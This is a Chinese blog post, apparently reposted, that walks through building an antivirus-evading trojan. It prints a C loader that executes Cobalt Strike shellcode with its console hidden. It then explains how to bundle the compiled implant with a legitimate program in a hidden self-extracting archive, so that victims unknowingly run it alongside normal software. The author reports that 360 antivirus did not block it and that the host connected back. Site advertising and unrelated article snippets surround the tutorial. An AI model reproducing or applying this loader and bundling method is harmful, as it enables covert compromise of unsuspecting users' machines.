exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路[通俗易懂]

exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路[通俗易懂]这里演示的方式为shellcode框架加载自解压1.生成shellcode2.c加载(随便拉的加载器)#include#include#pragmacomment(linker,”/subsystem:\”windows\”/entry:\”mainCRTStartup\””)unsignedcharshellcode[]=”\xfc\xe8\x89\x00\x00\x00\x60\…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

这里演示的方式为shellcode框架加载自解压

1.生成shellcode

2.c加载(随便拉的加载器)#include

#include

#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)

unsigned char shellcode[] =

“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b”

“\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0”

“\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57”;

void main()

{

((void(*)(void))&shellcode)();

}

3.自解压捆绑exe

当目标运行正常exe的同时会运行我们的木马

复现

使用cobaltstrike生成c的shellcode

55d3f772d354d36a658801abf4f14676.png

将生成的shellcode利用我们自己的加载器加载

c485c6afeda934281fb7bb6ad0ea2539.png

使用vc6++打开

编译组建 生成exe

7be92ab3014f1c06586fa1699eba3d57.png

13c29449ed82a99159860e49c3f9b507.png

生成的exe文件位于桌面debug文件目录下

70a93fd415e47e98bba496f131d2562b.png

接下来使用自解压捆绑exe文件

假设这里捆绑的软件为geek(卸载程序的一个软件)选择我们的木马和要捆绑的软件 选择添加到压缩文件

选择创建自解压格式压缩文件

高级 选择自解压选项

解压路径设置为c盘windows下的temp文件

解压后运行设置选择启动我们的exe和捆绑的软件

模式选择全部隐藏

更新选择解压并更新文件和覆盖所有文件

点击确认生成捆绑马

7d60bab74e826142c73bd426dd917dbf.png

3d640a481dfd4674b9732443b3f89f39.png

bc3b4cbd407a5dc161ee5ea932ecb67e.png

1f4fcd9cba49878bee61ee0031d8f104.png

651df41da1f3f1712bc76fec69229412.png

f5d11b7a18c020df417d095c8f54adb2.png

f2027e91c0ebeb77fb6672d9e1da8cca.png

点击确认 生成捆绑马

96866ac439ad26eb1761f3ca5425053e.png

这里环境有360 实验360并未作出拦截

双击运行看是否上线

02a1b07ee570898ab0c1e3be29424620.png

171d82a465e089de91a2649223cb5735.png

软件正常打开 并且主机成功上线

这个加载器的免杀效果一般 大佬们可以自行替换

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/171433.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • JAVA 日期格式化

    最近项目中需要用到SimpleDateFormat格式化日期,但是因为对日期格式的不熟练多花了十分钟左右的时间在日期格式化上面,所以趁着周末外面下着大雨闲着无聊整理一下日期格式问题。日期格式化学习预定义格式日期格式化样式自定义日期格式化预定义格式java提供了预定义的日期格式,预定义的日期格式可以满足绝大多数的场景需要。格式化日期需要两步:1、通过DateFormat.getDate…

    2022年4月6日
    49
  • 频谱分析仪的基本使用方法_频谱仪的功能使用

    频谱分析仪的基本使用方法_频谱仪的功能使用因为项目需要,今天学着使用的一下频谱分析仪,项目属于物联网类型,通信方式是使用的当前市面上比较火的Lora技术(当前市面上常用的两种低功耗远距离通信方案是LORA和NB-LOT)。本次使用频谱分析仪用来测量设计的板子用Lora发送无线数据时候的一些相关参数,主要测试天线发送数据时候的发射功率(单位:DB)。在这里对仪器的基本使用做一个记录,以为备忘。一、频谱分析仪的使用入门如下图为所使

    2022年8月11日
    2
  • 防止三极管饱和_稳压二极管稳压时处于什么偏置状态

    防止三极管饱和_稳压二极管稳压时处于什么偏置状态下图为一个分立器件搭建的BUCK电路,但是不明白图中的两个肖特基二极管(D1.D2)的作用是什么防止Q1饱和,但沒深度。

    2022年9月4日
    4
  • 阿里云服务器怎样开放端口

    阿里云服务器怎样开放端口1、登录阿里云官方2、进入控制台3、在控制台里点击产品与服务——云服务器ECS4、在云服务器ECS选项里点击网络和安全——安全组5、可以自己创建安全组,也可以现有的配置规则6、然后点击右上方的添加安全组规则7、填上端口号,允许的ip地址,点击确定就可以了端口例如:8001/8001授权对象:0.0.0.0/0…

    2022年9月26日
    0
  • imfill简介_im ill

    imfill简介_im illBW2=imfill(BW)这种格式将一张二值图像显示在屏幕上,允许用户使用鼠标在图像上点几个点,这几个点围成的区域即要填充的区域。要以这种交互方式操作,BW必须是一个二维的图像。用户可以通过按Backspace键或者Delete键来取消之前选择的区域;通过shift+鼠标左键单击或者鼠标右键单击或双击可以确定选择区域。[BW2,locations]=imfill(BW)

    2022年9月13日
    2
  • 模糊pid控制算法matlab_matlab模糊控制器

    模糊pid控制算法matlab_matlab模糊控制器上一篇写了模糊自整定PID的理论,这篇来做MATLAB仿真。目录补充内容:如何计算临界稳定下的开环增益Ku和震荡周期TuMATLAB进行模糊PID仿真1、准备工作2、模糊控制器的设计补充内容:如何计算临界稳定下的开环增益Ku和震荡周期Tu学过控制工程或者相关理论的同学应该比较了解,判断系统稳定性的条件一般用到劳斯表(劳斯判据)。而PID控制和模糊PI…

    2022年5月3日
    59

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号